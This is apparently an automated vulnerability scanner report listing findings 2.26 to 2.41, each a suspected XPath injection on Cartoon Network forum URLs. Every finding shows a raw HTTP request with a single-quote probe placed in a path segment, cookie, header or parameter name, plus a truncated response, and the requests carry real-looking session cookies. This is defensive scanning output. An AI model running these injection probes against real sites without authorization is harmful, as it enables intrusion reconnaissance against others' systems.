Cookie: s_cc=true; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]'; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true; JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/index.html%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cartoonnetwork.com/forums%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 02:45:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A4D5FE7714B980EAC577CA7634A35CA0; Path=/forums
Vary: User-Agent,Accept-Encoding
Set-Cookie: route=r.ctns1jive1; path=/forums;
Content-Length: 55347


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.26. http://www.cartoonnetwork.com/forums/Go [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums/Go

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums'/Go HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:02:17 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.27. http://www.cartoonnetwork.com/forums/javascript:searchToon() [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums/javascript:searchToon()

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums'/javascript:searchToon() HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:02:08 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.28. http://www.cartoonnetwork.com/forums/rss/rssmessages.jspa [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums/rss/rssmessages.jspa

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums'/rss/rssmessages.jspa HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:02:00 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.29. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [1401316autoFreqCap cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums/usersettings!default.jspa

Issue detail

The 1401316autoFreqCap cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the 1401316autoFreqCap cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums/usersettings!default.jspa HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0'; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=340DB3A4B3A70E1E35C8438199BE15C3; Path=/forums
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 55597


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.30. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [JSESSIONID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums/usersettings!default.jspa

Issue detail

The JSESSIONID cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the JSESSIONID cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums/usersettings!default.jspa HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290'; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=445F7F1A678351BFA3D342D64409C4F0; Path=/forums
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 55597


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.31. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums/usersettings!default.jspa

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums'/usersettings!default.jspa HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:01:58 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.32. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums/usersettings!default.jspa

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums/usersettings!default.jspa HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;
Referer: http://www.google.com/search?hl=en&q='

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=AF906E3A14D8B306F9A312D913999F30; Path=/forums
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 55597


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.33. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums/usersettings!default.jspa

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums/usersettings!default.jspa HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=B964DAC1E466E71BFD764C97E4E8342E; Path=/forums
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 55597


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.34. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [adDEmas cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums/usersettings!default.jspa

Issue detail

The adDEmas cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the adDEmas cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums/usersettings!default.jspa HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&';

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:56 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=6617ABF0363BA0BC2919003A812C3D01; Path=/forums
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 55597


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.35. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [adDEon cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums/usersettings!default.jspa

Issue detail

The adDEon cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the adDEon cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums/usersettings!default.jspa HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true'; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=7C5383C912EA83B4BDF2DE44CEBA8D92; Path=/forums
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 55597


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.36. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums/usersettings!default.jspa

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums/usersettings!default.jspa?1'=1 HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=5EF58FA479A84351CB01FCDB9AB841F3; Path=/forums
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 55597


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.37. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [route cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums/usersettings!default.jspa

Issue detail

The route cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the route cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums/usersettings!default.jspa HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3'; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=EC1E897B03B3BBA4438FFA3C199BEABC; Path=/forums
Vary: User-Agent,Accept-Encoding
Set-Cookie: route=r.ctns1jive1; path=/forums;
Connection: close
Content-Length: 55597


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.38. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [s_cc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums/usersettings!default.jspa

Issue detail

The s_cc cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_cc cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums/usersettings!default.jspa HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true'; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A8DE2C02511956FD43ED227F222D48F9; Path=/forums
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 55597


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.39. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [s_sq cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums/usersettings!default.jspa

Issue detail

The s_sq cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_sq cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums/usersettings!default.jspa HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA'; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=49F1A79308FA19B00F45AC773E292B43; Path=/forums
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 55597


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.40. http://www.cartoonnetwork.com/forums/usersettings!default.jspa [s_vi cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /forums/usersettings!default.jspa

Issue detail

The s_vi cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_vi cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /forums/usersettings!default.jspa HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]'; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=9367BB2F32AE111634815B854B560F5C; Path=/forums
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 55597


<!doctype html public "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3c.org/TR/xhtmll/DTD/xhtmll-transitional.dtd">
<html xmlns="http://www.w3c.org/1999/xhtml" xml:lang="EN" lang="EN"
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.41. http://www.cartoonnetwork.com/freewheel/js/fwjslib_1.1.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /freewheel/js/fwjslib_1.1.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /freewheel'/js/fwjslib_1.1.js HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

